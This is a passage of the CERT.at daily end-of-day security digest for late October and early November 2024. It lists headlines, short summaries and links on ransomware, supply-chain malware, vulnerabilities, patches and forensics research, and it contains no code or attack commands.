---------------------------------------------
The botnet is being skillfully used to launch "highly evasive" password-spraying attacks.
---------------------------------------------
https://arstechnica.com/information-technology/2024/11/microsoft-warns-of-8…
∗∗∗ DDoS site Dstat.cc seized and two suspects arrested in Germany ∗∗∗
---------------------------------------------
The Dstat.cc DDoS review platform has been seized by law enforcement, and two suspects have been arrested after the service helped fuel distributed denial-of-service attacks for years.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/ddos-site-dstatcc-seized-and…
∗∗∗ Cisco says DevHub site leak won’t enable future breaches ∗∗∗
---------------------------------------------
Cisco says that non-public files recently downloaded by a threat actor from a misconfigured public-facing DevHub portal don't contain information that could be exploited in future breaches of the company's systems.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cisco-says-devhub-site-leak-…
∗∗∗ Goods never delivered: fraudsters hack thousands of web shops and rake in millions ∗∗∗
---------------------------------------------
Since 2019, hackers have infiltrated countless online shops as part of a fraud campaign. Buyers of certain products received ..
---------------------------------------------
https://www.golem.de/news/ware-nicht-geliefert-betrueger-hacken-tausende-we…
∗∗∗ From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code ∗∗∗
---------------------------------------------
In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta's CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind.
---------------------------------------------
https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.ht…
∗∗∗ Inside Iran’s Cyber Playbook: AI, Fake Hosting, and Psychological Warfare ∗∗∗
---------------------------------------------
U.S. and Israeli cybersecurity agencies have published a new advisory attributing to an Iranian cyber group the targeting of the 2024 Summer Olympics and the compromise of a French commercial dynamic display provider to show messages denouncing Israel's participation ..
---------------------------------------------
https://thehackernews.com/2024/11/inside-irans-cyber-playbook-ai-fake.html
∗∗∗ Financial institutions told to get their house in order before the next CrowdStrike strikes ∗∗∗
---------------------------------------------
Calls for improvements will soon turn into demands when new rules come into force. [..] The UK's finance regulator is urging all institutions under its remit to better prepare for IT meltdowns like ..
---------------------------------------------
https://www.theregister.com/2024/11/02/fca_it_resilience/
∗∗∗ Booking.com Phishers May Leave You With Reservations ∗∗∗
---------------------------------------------
A number of cybercriminal innovations are making it easier for scammers to cash in on your upcoming travel plans. This story examines a recent spear-phishing campaign that ensued when a California hotel had its booking.com credentials stolen. We'll ..
---------------------------------------------
https://krebsonsecurity.com/2024/11/booking-com-phishers-may-leave-you-with…
∗∗∗ Free webinars on staying safe online ∗∗∗
---------------------------------------------
Starting 2 December, in cooperation with AK Oberösterreich and Saferinternet.at, exciting webinars on the safe and responsible use of mobile phones and the internet will take place. Expand your digital skills and ..
---------------------------------------------
https://www.watchlist-internet.at/news/kostenlose-webinare-zum-schutz-im-in…
∗∗∗ TA Phone Home: EDR Evasion Testing Reveals Extortion Actors Toolkit ∗∗∗
---------------------------------------------
A threat actor attempted to use an AV/EDR bypass tool in an extortion attempt. Instead, the tool provided Unit 42 insight into the threat actor.
---------------------------------------------
https://unit42.paloaltonetworks.com/edr-bypass-extortion-attempt-thwarted/
∗∗∗ FBI wants more info on hackers behind Sophos exploitation after report on China’s intrusions ∗∗∗
---------------------------------------------
The FBI is asking the public for help in tracking down the people behind a series of intrusions into edge devices and networks.
---------------------------------------------
https://therecord.media/fbi-hackers-china-wants-info
∗∗∗ Kimsuky Group’s Malware Disguised as Lecture Request Form (MSC, HWP) ∗∗∗
---------------------------------------------
Recently, malware disguised as a lecture request form targeting specific users was identified. The distributed files include Hangul Word Processor (HWP) documents and files in MSC format, which download additional malicious files. Decoy document files used to disguise as legitimate documents have been found to sometimes contain ..
---------------------------------------------
https://asec.ahnlab.com/en/84181/
∗∗∗ Supply Chain Attack Using Ethereum Smart Contracts to Distribute Multi-Platform Malware ∗∗∗
---------------------------------------------
[..] package “jest-fet-mock,” which implements a different approach using Ethereum smart contracts for command-and-control operations. The package masquerades as a popular testing utility while distributing malware across Windows, Linux, and macOS platforms. This discovery represents a notable difference in supply chain attack methodologies, combining ..
---------------------------------------------
https://checkmarx.com/blog/supply-chain-attack-using-ethereum-smart-contrac…
∗∗∗ Hackers Claim Access to Nokia Internal Data, Selling for $20,000 ∗∗∗
---------------------------------------------
Hackers claim to have breached Nokia through a third-party contractor, allegedly stealing SSH keys, source code, and internal
---------------------------------------------
https://hackread.com/hackers-claim-access-nokia-internal-data-selling-20k/
∗∗∗ Mallox Ransomware ∗∗∗
---------------------------------------------
FortiGuard Labs continues to see an increase in Mallox ransomware-related activity, detecting Mallox ransomware on several hundred FortiGuard sensors. Ransomware infection may cause disruption, damage to daily operations, ..
---------------------------------------------
https://fortiguard.fortinet.com/outbreak-alert/mallox-ransomware
∗∗∗ Missing Link: How a company lost control during a cyberattack ∗∗∗
---------------------------------------------
The head of IT actually feels quite safe. Until hackers march into the company in the middle of the day, and walk out again unchallenged. Their loot: full control.
---------------------------------------------
https://heise.de/-9984869
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox, grafana, kernel, and mod_http2), Debian (chromium, openssl, and thunderbird), Fedora (chromium, krb5, mysql8.0, polkit, python-single-version, and webkitgtk), Mageia (bind, buildah, podman, skopeo, kernel, kmod-xtables-addons, kmod-virtualbox, kernel-firmware & kernel-firmware-nonfree radeon-firmware, ..
---------------------------------------------
https://lwn.net/Articles/996908/
∗∗∗ WordPress Vulnerability & Patch Roundup October 2024 ∗∗∗
---------------------------------------------
https://blog.sucuri.net/2024/11/wordpress-vulnerability-patch-roundup-octob…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 30-10-2024 18:00 − Thursday 31-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ With 2FA Enabled: NPM Package lottie-player Taken Over by Attackers ∗∗∗
---------------------------------------------
On October 30, the community reported existence of malicious code within versions 2.0.5, 2.0.6, and 2.0.7 of the npm package. The package maintainers replied and confirmed the attackers were able to take over the NPM package using a leaked automation token which was used to automate publications of NPM packages.
---------------------------------------------
https://checkmarx.com/blog/with-2fa-enabled-npm-package-lottie-player-taken…
∗∗∗ GreyNoise Intelligence Discovers Zero-Day Vulnerabilities in Live Streaming Cameras with the Help of AI ∗∗∗
---------------------------------------------
Affected devices are typically high-cost live streaming cameras, sometimes exceeding several thousand dollars. [..] Affected devices use VHD PTZ camera firmware < 6.3.40 used in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63. These cameras, which feature an embedded web server allowing for direct access by web browser, are reportedly deployed in environments where reliability and privacy are crucial, including: Industrial and manufacturing plants [..] Business conferences [..] Healthcare settings [..] State and local government environments [..] Houses of worship
---------------------------------------------
https://www.greynoise.io/blog/greynoise-intelligence-discovers-zero-day-vul…
∗∗∗ Midnight Blizzard conducts large-scale spear-phishing campaign using RDP files ∗∗∗
---------------------------------------------
Microsoft is releasing this blog to notify the public and disrupt this threat actor activity. This blog provides context on these external spear-phishing attempts, which are common attack techniques and do not represent any new compromise of Microsoft.
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-…
∗∗∗ Discovering Hidden Vulnerabilities in Portainer with CodeQL ∗∗∗
---------------------------------------------
In this blog, we will show how we used CodeQL to find these vulnerabilities and even wrote custom queries to find a specific vulnerability.
---------------------------------------------
https://www.cyberark.com/resources/threat-research-blog/discovering-hidden-…
∗∗∗ Loose-lipped neural networks and lazy scammers ∗∗∗
---------------------------------------------
As large language models improve, their strengths and weaknesses, as well as the tasks they do well or poorly, are becoming better understood. Threat actors are exploring applications of this technology in a range of automation scenarios. But, as we see, they sometimes commit blunders that help shed light on how they use LLMs, at least in the realm of online fraud.
---------------------------------------------
https://securelist.com/llm-phish-blunders/114367/
∗∗∗ Mounting memory with MemProcFS for advanced memory forensics ∗∗∗
---------------------------------------------
Whilst this blog does not intend to go into detail on the most popular tools available to analyse memory, nor to offer a deep dive into analysis techniques, it is intended to provide high-level information about some significant enhancements to memory forensics in the last few years and the differences in tooling. It also covers three memory forensic tools; many others are available.
---------------------------------------------
https://www.pentestpartners.com/security-blog/mounting-memory-with-memprocf…
∗∗∗ The Persistent Perimeter Threat: Strategic Insights from a Multi-Year APT Campaign Targeting Edge Devices ∗∗∗
---------------------------------------------
Discover insights from a multi-year APT campaign that exploited network perimeter vulnerabilities to target high-value entities, revealing critical gaps in edge device security.
---------------------------------------------
https://www.greynoise.io/blog/the-persistent-perimeter-threat-strategic-ins…
∗∗∗ Auditing K3s Clusters ∗∗∗
---------------------------------------------
K3s shares a great deal with standard Kubernetes, but its lightweight implementation comes with some challenges and opportunities in the security sphere.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/auditing-k3s-clusters/
=====================
= Vulnerabilities =
=====================
∗∗∗ LiteSpeed Cache WordPress plugin bug lets hackers get admin access ∗∗∗
---------------------------------------------
The free version of the popular WordPress plugin LiteSpeed Cache has fixed a dangerous privilege elevation flaw on its latest release that could allow unauthenticated site visitors to gain admin rights. [..] The newly discovered high-severity flaw tracked as CVE-2024-50550 is caused by a weak hash check in the plugin's "role simulation" feature, designed to simulate user roles to aid the crawler in site scans from different user levels.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/litespeed-cache-wordpress-pl…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (firefox-esr and openssl), Fedora (firefox, libarchive, micropython, NetworkManager-libreswan, and xorg-x11-server-Xwayland), Red Hat (nano), Slackware (mozilla-firefox, mozilla-thunderbird, tigervnc, and xorg), SUSE (389-ds, Botan, go1.21-openssl, govulncheck-vulndb, java-11-openjdk, lxc, python-Werkzeug, and uwsgi), and Ubuntu (firefox, libarchive, linux-azure-fde, linux-azure-fde-5.15, python-pip, and xorg-server, xorg-server-hwe-16.04, xorg-server-hwe-18.04).
---------------------------------------------
https://lwn.net/Articles/996526/
∗∗∗ Drupal: Cookiebot + GTM - Moderately critical - Cross Site Scripting - SA-CONTRIB-2024-055 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-contrib-2024-055
∗∗∗ Bosch: DoS vulnerability on IndraDrive ∗∗∗
---------------------------------------------
https://psirt.bosch.com/security-advisories/bosch-sa-315415.html
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 29-10-2024 18:00 − Wednesday 30-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Hackers steal 15,000 cloud credentials from exposed Git config files ∗∗∗
---------------------------------------------
A large-scale global campaign dubbed "EmeraldWhale" exploited misconfigured Git configuration files to steal over 15,000 cloud account credentials from thousands of private repositories.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-steal-15-000-cloud-c…
∗∗∗ Jumpy Pisces Engages in Play Ransomware ∗∗∗
---------------------------------------------
Jumpy Pisces, also known as Andariel and Onyx Sleet, was historically involved in cyberespionage, financial crime and ransomware attacks. [..] We expect their attacks will increasingly target a wide range of victims globally. Network defenders should view Jumpy Pisces activity as a potential precursor to ransomware attacks, not just espionage, underscoring the need for heightened vigilance.
---------------------------------------------
https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomwa…
∗∗∗ Writing a BugSleep C2 server and detecting its traffic with Snort ∗∗∗
---------------------------------------------
In June 2024, security researchers published their analysis of a novel implant dubbed “MuddyRot”(aka "BugSleep"). [..] This blog will demonstrate the practice and methodology of reversing BugSleep’s protocol, writing a functional C2 server, and detecting this traffic with Snort.
---------------------------------------------
https://blog.talosintelligence.com/writing-a-bugsleep-c2-server/
∗∗∗ Cryptocurrency Enthusiasts Targeted in Multi-Vector Supply Chain Attack ∗∗∗
---------------------------------------------
Cryptocurrency enthusiasts have been the target of another sophisticated and invasive malware campaign. This campaign was orchestrated through multiple attack vectors, including a malicious Python package named “cryptoaitools” on PyPI and deceptive GitHub repositories. This multi-stage malware, masquerading as a suite of cryptocurrency trading tools, aims to steal a wide range of sensitive data and drain victims’ crypto wallets.
---------------------------------------------
https://checkmarx.com/blog/cryptocurrency-enthusiasts-targeted-in-multi-vec…
∗∗∗ New “Scary” FakeCall Malware Captures Photos and OTPs on Android ∗∗∗
---------------------------------------------
A new, more sophisticated variant of the FakeCall malware is targeting Android devices. [..] The FakeCall malware typically infiltrates a device through a malicious app downloaded from a compromised website or a phishing email. The app requests permission to become the default call handler. If granted, the malware gains extensive privileges.
---------------------------------------------
https://hackread.com/scary-fakecall-malware-captures-photos-otps-android/
=====================
= Vulnerabilities =
=====================
∗∗∗ After Pwn2Own: QNAP and Synology patch exploited NAS vulnerabilities ∗∗∗
---------------------------------------------
For the TrueNAS vulnerabilities exploited at Pwn2Own there appear to be no patches yet, but there is guidance on how users can protect their systems against possible attacks. [..] Initial patches are available from Synology, for example. On 25 October the company already provided updates for Beephotos for Beestation OS 1.0 and 1.1 as well as Synology Photos 1.7 and 1.6 for DSM 7.2. Each of these closes a critical vulnerability that allows attackers to execute malicious code remotely.
---------------------------------------------
https://www.golem.de/news/nach-pwn2own-qnap-und-synology-patchen-ausgenutzt…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (buildah), Debian (python-git, texlive-bin, and xorg-server), Mageia (chromium-browser-stable), Red Hat (kernel), SUSE (Botan, go1.22-openssl, go1.23-openssl, grafana, libgsf, pcp, pgadmin4, python310-pytest-html, python313, xorg-x11-server, and xwayland), and Ubuntu (nano, python-urllib3, and xorg-server, xwayland).
---------------------------------------------
https://lwn.net/Articles/996310/
∗∗∗ QNAP: Vulnerability in SMB Service (PWN2OWN 2024) ∗∗∗
---------------------------------------------
https://www.qnap.com/en-us/security-advisory/QSA-24-42
∗∗∗ SPLUNK: SVD-2024-1015: Third-Party Package Updates in the Splunk Add-on for Cisco Meraki - October 2024 ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1015
∗∗∗ SPLUNK: SVD-2024-1014: Third-Party Package Updates in the Splunk Add-on for Google Cloud Platform - October 2024 ∗∗∗
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1014
∗∗∗ Ping Identity PingIDM: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/query-filter-injectio…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 28-10-2024 18:00 − Tuesday 29-10-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ New tool bypasses Google Chrome’s new cookie encryption system ∗∗∗
---------------------------------------------
A researcher has released a tool to bypass Google's new App-Bound encryption cookie-theft defenses and extract saved credentials from the Chrome web browser.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-tool-bypasses-google-chr…
∗∗∗ Exchange Online: Inbound SMTP DANE with DNSSEC available ∗∗∗
---------------------------------------------
Microsoft has made Inbound SMTP DANE with DNSSEC generally available for Exchange Online, after it had already been available as a preview in July 2024. The new Inbound SMTP DANE with DNSSEC feature in Exchange Online is intended to increase the security of e-mail communication by supporting two security standards.
---------------------------------------------
https://www.borncity.com/blog/2024/10/29/exchange-online-inbound-smtp-dane-…
∗∗∗ Ransomware attacks on Sonicwall SSL VPNs ∗∗∗
---------------------------------------------
IT researchers have analysed attacks on Sonicwall SSL VPNs and discovered ransomware activity by Akira and Fog. [..] The Sonicwall devices through which the perpetrators were able to break in were all unpatched against the vulnerability CVE-2024-40766; with a CVSS score of 9.3 it is rated a critical risk. In early September Sonicwall warned that this vulnerability in the SSL VPNs was already being actively exploited, and again pointed to the available updates that close the security hole.
---------------------------------------------
https://heise.de/-9998068
∗∗∗ New Research Reveals Spectre Vulnerability Persists in Latest AMD and Intel Processors ∗∗∗
---------------------------------------------
More than six years after the Spectre security flaw impacting modern CPU processors came to light, new research has found that the latest AMD and Intel processors are still susceptible to speculative execution attacks. [..] The attack has been described as the first, practical "end-to-end cross-process Spectre leak."
---------------------------------------------
https://thehackernews.com/2024/10/new-research-reveals-spectre.html
∗∗∗ What Are My OPTIONS? CyberPanel v2.3.6 pre-auth RCE ∗∗∗
---------------------------------------------
A few months ago I was assigned to do a pentest on a target running CyberPanel. It seemed to be installed by default by some VPS providers & it was also sponsored by Freshworks. [..] if you’re a beginner with a creative mind looking to get started with code review, I definitely recommend you read this blog.
---------------------------------------------
https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v2…
∗∗∗ Beware of this Instagram message: "I need your help" ∗∗∗
---------------------------------------------
"I need your help," writes a well-known person, or a friend, on Instagram. The person asks you to vote for them in a poll and sends you a link. Beware: it is a scam!
---------------------------------------------
https://www.watchlist-internet.at/news/instagram-nachricht-hilfe/
=====================
= Vulnerabilities =
=====================
∗∗∗ QNAP: Vulnerability in HBS 3 Hybrid Backup Sync (PWN2OWN 2024) ∗∗∗
---------------------------------------------
An OS command injection vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If exploited, the vulnerability could allow remote attackers to execute arbitrary commands. Critical, CVE-2024-50388
---------------------------------------------
https://www.qnap.com/en-us/security-advisory/QSA-24-41
∗∗∗ Spring: Authorization Bypass of Static Resources in WebFlux Applications ∗∗∗
---------------------------------------------
Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances. CRITICAL, CVE-2024-38821
---------------------------------------------
https://spring.io/security/cve-2024-38821/
∗∗∗ Also available: updates for iOS 17, macOS 14 and macOS 13 with security fixes ∗∗∗
---------------------------------------------
In addition to iOS 18.1, iPadOS 18.1 and macOS 15.1, Apple has also released updates for older operating systems. They fix only security issues.
---------------------------------------------
https://heise.de/-9997116
∗∗∗ Mozilla Security Advisories October 29, 2024 ∗∗∗
---------------------------------------------
Thunderbird 132, Thunderbird 128.4, Firefox ESR 115.17, Firefox ESR 128.4 and Firefox 132.
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (exim4) and SUSE (chromium, openssl-1_1, and openssl-3).
---------------------------------------------
https://lwn.net/Articles/996196/
∗∗∗ 0patch: We Patched CVE-2024-38030, Found Another Windows Themes Spoofing Vulnerability (0day) ∗∗∗
---------------------------------------------
https://blog.0patch.com/2024/10/we-patched-cve-2024-38030-found-another.html
∗∗∗ OneDev Security Update Advisory (CVE-2024-45309) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/84118/
∗∗∗ Solar-Log Base 15 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-303-02
∗∗∗ Delta Electronics InfraSuite Device Master ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-303-03
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 25-10-2024 18:00 − Montag 28-10-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Amazon seizes domains used in rogue Remote Desktop campaign to steal data ∗∗∗
---------------------------------------------
Amazon has seized domains used by the Russian APT29 hacking group in targeted attacks against government and military organizations to steal Windows credentials and data using malicious Remote Desktop Protocol connection files.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/amazon-seizes-domains-used-i…
∗∗∗ Redline, Meta infostealer malware operations seized by police ∗∗∗
---------------------------------------------
The Dutch National Police seized the network infrastructure for the Redline and Meta infostealer malware operations in "Operation Magnus," warning cybercriminals that their data is now in the hands of the law enforcement.
---------------------------------------------
https://www.bleepingcomputer.com/news/legal/redline-meta-infostealer-malwar…
∗∗∗ 70 zero-day vulnerabilities exploited: Pwn2Own hackers crack Samsung Galaxy S24 and more ∗∗∗
---------------------------------------------
Various cameras, printers and NAS systems were also attacked during the competition. Nobody dared to take on a Pixel 8 or an iPhone 15, however.
---------------------------------------------
https://www.golem.de/news/70-zero-day-luecken-ausgenutzt-pwn2own-hacker-kna…
∗∗∗ The Windows Registry Adventure #4: Hives and the registry layout ∗∗∗
---------------------------------------------
To a normal user or even a Win32 application developer, the registry layout may seem simple: there are five root keys that we know from Regedit (abbreviated as HKCR, HKLM, HKCU, HKU and HKCC), and each of them contains a nested tree structure that serves a specific role in the system. But as one tries to dig deeper and understand how the registry ..
---------------------------------------------
https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventu…
∗∗∗ Notorious Hacker Group TeamTNT Launches New Cloud Attacks for Crypto Mining ∗∗∗
---------------------------------------------
The infamous cryptojacking group known as TeamTNT appears to be readying for a new large-scale campaign targeting cloud-native environments for mining cryptocurrencies and renting out breached servers to third parties. "The group is currently ..
---------------------------------------------
https://thehackernews.com/2024/10/notorious-hacker-group-teamtnt-launches.h…
∗∗∗ Cybercriminals Pose a Greater Threat of Disruptive US Election Hacks Than Russia or China ∗∗∗
---------------------------------------------
A report distributed by the US Department of Homeland Security warned that financially motivated cybercriminals are more likely to attack US election infrastructure than state-backed hackers.
---------------------------------------------
https://www.wired.com/story/cybercriminals-disruptive-hacking-us-elections-…
∗∗∗ Vulnerabilities of Realtek SD card reader driver, part 1 ∗∗∗
---------------------------------------------
These vulnerabilities enable non-privileged users to leak the contents of kernel pool and kernel stack, write to arbitrary kernel memory, and, the most interesting, read and write physical memory from user mode via the DMA capability of the device. The vulnerabilities have remained undisclosed for years, affecting many OEMs, including Dell, ..
---------------------------------------------
https://zwclose.github.io/2024/10/14/rtsper1.html
∗∗∗ Inside the Open Directory of the “You Dun” Threat Group ∗∗∗
---------------------------------------------
The DFIR Report’s Threat Intel Team detected an open directory in January 2024 and analyzed it for tradecraft and threat actor activity. Once reviewed, we identified it was related to the Chinese-speaking hacking group that calls itself “You Dun” ..
---------------------------------------------
https://thedfirreport.com/2024/10/28/inside-the-open-directory-of-the-you-d…
∗∗∗ The NSA recommends a weekly smartphone reboot ∗∗∗
---------------------------------------------
Interesting information that came my way this week. The US security agency NSA (National Security Agency, domestic intelligence service) recommends restarting your smartphone once a week. This has a security background. The reboot is intended to remove malware that is not persistent ..
---------------------------------------------
https://www.borncity.com/blog/2024/10/27/die-nsa-empfiehlt-woechentliches-s…
∗∗∗ Anatomy of an LLM RCE ∗∗∗
---------------------------------------------
As large language models (LLMs) become more advanced and are granted additional capabilities by developers, security risks increase dramatically. Manipulated LLMs are no longer just a ..
---------------------------------------------
https://www.cyberark.com/resources/threat-research-blog/anatomy-of-an-llm-r…
∗∗∗ Hybrid Russian Espionage and Influence Campaign Aims to Compromise Ukrainian Military Recruits and Deliver Anti-Mobilization Narratives ∗∗∗
---------------------------------------------
In September 2024, Google Threat Intelligence Group (consisting of Google’s Threat Analysis Group (TAG) and Mandiant) discovered UNC5812, a suspected Russian hybrid espionage and influence operation, delivering Windows and Android malware using a Telegram persona named "Civil Defense". "Civil Defense" claims to be a provider of free ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-…
∗∗∗ Secure Coding: Preventing unauthorized access through path traversal (CWE-22) ∗∗∗
---------------------------------------------
CWE-22 describes the improper modification of a pathname to a restricted directory. How can this weakness be brought under control?
---------------------------------------------
https://heise.de/-9982270
∗∗∗ Black Basta group uses Microsoft Teams chat function ∗∗∗
---------------------------------------------
The ransomware group known as "Black Basta" has developed a new mechanism that abuses the chat function of Microsoft Teams to make contact with victims.
---------------------------------------------
https://heise.de/-9995322
∗∗∗ Nvidia: privilege escalation possible through vulnerabilities in graphics driver ∗∗∗
---------------------------------------------
Nvidia warns of several vulnerabilities in its graphics drivers that, among other things, allow privilege escalation. Updates are available.
---------------------------------------------
https://heise.de/-9995842
∗∗∗ 2024 situation report: malware installed almost 8 million times from Google Play ∗∗∗
---------------------------------------------
Security researchers have examined the mobile malware situation of the past 12 months. More than 200 fake apps lurked in Google Play.
---------------------------------------------
https://heise.de/-9996456
∗∗∗ VMware Tanzu Spring Security: bypass of authorization rules possible ∗∗∗
---------------------------------------------
VMware Tanzu Spring Security contains a critical vulnerability that allows attackers to bypass authorization rules.
---------------------------------------------
https://heise.de/-9996582
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel, python3.12, and python3.9), Debian (activemq, chromium, libheif, nss, and twisted), Fedora (chromium, dnsdist, dotnet8.0, edk2, glibc, libdigidocpp, mbedtls3.6, NetworkManager-libreswan, oath-toolkit, podman-tui, prometheus-podman-exporter, python-fastapi, python-openapi-core, ..
---------------------------------------------
https://lwn.net/Articles/996085/
∗∗∗ Chatwork Desktop Application (Windows) uses a potentially dangerous function ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN78335885/
∗∗∗ K000148252: Python tarfile vulnerability CVE-2024-6232 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148252
∗∗∗ K000148256: libarchive vulnerability CVE-2018-1000880 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000148256
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 24-10-2024 18:00 − Freitag 25-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Denial of Service in Cisco ASA & FTD and further Cisco advisories ∗∗∗
---------------------------------------------
In a recently published advisory, Cisco reports being aware of "malicious use" of a denial-of-service vulnerability in Cisco Adaptive Security Appliance & Firepower Threat Defense Software Remote Access VPN. According to reports, however, these are not targeted denial-of-service attacks but side effects of broadly distributed brute-force or credential-spraying attacks.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/10/denial-of-service-in-cisco-asa-ftd…
∗∗∗ Object-oriented and less redundant: the BSI presents IT-Grundschutz++ ∗∗∗
---------------------------------------------
The BSI has set itself the goal of making IT-Grundschutz more user-friendly. To that end it relies on machine readability and leaner documentation.
---------------------------------------------
https://heise.de/-9994010
∗∗∗ AWS Cloud Development Kit Vulnerability Exposes Users to Potential Account Takeover Risks ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed a security flaw impacting Amazon Web Services (AWS) Cloud Development Kit (CDK) that could have resulted in an account takeover under specific circumstances. [..] Following responsible disclosure on June 27, 2024, the issue was addressed by the project maintainers in CDK version 2.149.0 released in July.
---------------------------------------------
https://thehackernews.com/2024/10/aws-cloud-development-kit-vulnerability.h…
∗∗∗ NotLockBit: ransomware discovery serves as wake-up call for Mac users ∗∗∗
---------------------------------------------
Historically, Mac users haven't had to worry about malware as much as their Windows-using cousins. But that doesn't mean that Mac users should be complacent. And the recent discovery of a new malware strain emphasises that the threat - even if much smaller than on Windows - remains real.
---------------------------------------------
https://www.tripwire.com/state-of-security/notlockbit-rransomware-discovery…
∗∗∗ Embargo ransomware: Rock’n’Rust ∗∗∗
---------------------------------------------
Novice ransomware group Embargo is testing and deploying a new Rust-based toolkit
---------------------------------------------
https://www.welivesecurity.com/en/eset-research/embargo-ransomware-rocknrus…
∗∗∗ From crisis to confidence: How the University of Rijeka used a network breach to reboot their cybersecurity ∗∗∗
---------------------------------------------
How would your institution respond if a seemingly ordinary system check uncovered a major security incident? That’s exactly what the University of Rijeka faced when a member of the IT team discovered an unauthorised virtual machine template during a routine check — just as a new academic year began.
---------------------------------------------
https://connect.geant.org/2024/10/25/from-crisis-to-confidence-how-the-univ…
∗∗∗ Modern data harvesters: smart TVs track even HDMI content ∗∗∗
---------------------------------------------
Smart TVs analyze screen content even when an HDMI source device is used. The analyses serve targeted advertising.
---------------------------------------------
https://heise.de/-9994787
∗∗∗ Vonovia under criticism: smart smoke detectors carry a risk of espionage ∗∗∗
---------------------------------------------
The smoke detectors collect all kinds of information about air quality and send it over the internet - a welcome trove of data for criminals. [..] Vonovia itself allegedly processes the data only in anonymized form.
---------------------------------------------
https://www.golem.de/news/vonovia-in-der-kritik-smarte-rauchmelder-bergen-r…
=====================
= Vulnerabilities =
=====================
NTR
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 23-10-2024 18:00 − Donnerstag 24-10-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ New Qilin ransomware encryptor features stronger encryption, evasion ∗∗∗
---------------------------------------------
A new Rust-based variant of the Qilin (Agenda) ransomware strain, dubbed Qilin.B, has been spotted in the wild, featuring stronger encryption, better evasion from security tools, and the ability to disrupt data recovery mechanisms.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-qilin-ransomware-encrypt…
∗∗∗ New OpenSSL vulnerability is dangerous but very hard to exploit ∗∗∗
---------------------------------------------
While SuSE and the BSI see a high risk, the OpenSSL project points to the extensive preconditions for an exploit. For now there are no updates. [..] They rated the risk of the vulnerability with CVE ID CVE-2024-9143 as low because the bug is difficult to exploit.
---------------------------------------------
https://heise.de/-9992067
∗∗∗ Location tracking of phones is out of control. Here’s how to fight back. ∗∗∗
---------------------------------------------
Unique IDs assigned to Android and iOS devices threaten your privacy. Who knew? You likely have never heard of Babel Street or Location X, but chances are good that they know a lot about you and anyone else you know who keeps a phone nearby around the clock.
---------------------------------------------
https://arstechnica.com/information-technology/2024/10/phone-tracking-tool-…
∗∗∗ Investigating volatile data with advanced memory forensics tools – part 1 ∗∗∗
---------------------------------------------
In this two post series I want to highlight how memory forensics plays a crucial role in enhancing forensic investigations. Specifically by providing access to volatile data that cannot be retrieved from storage devices like hard drives.
---------------------------------------------
https://www.pentestpartners.com/security-blog/investigating-volatile-data-w…
=====================
= Vulnerabilities =
=====================
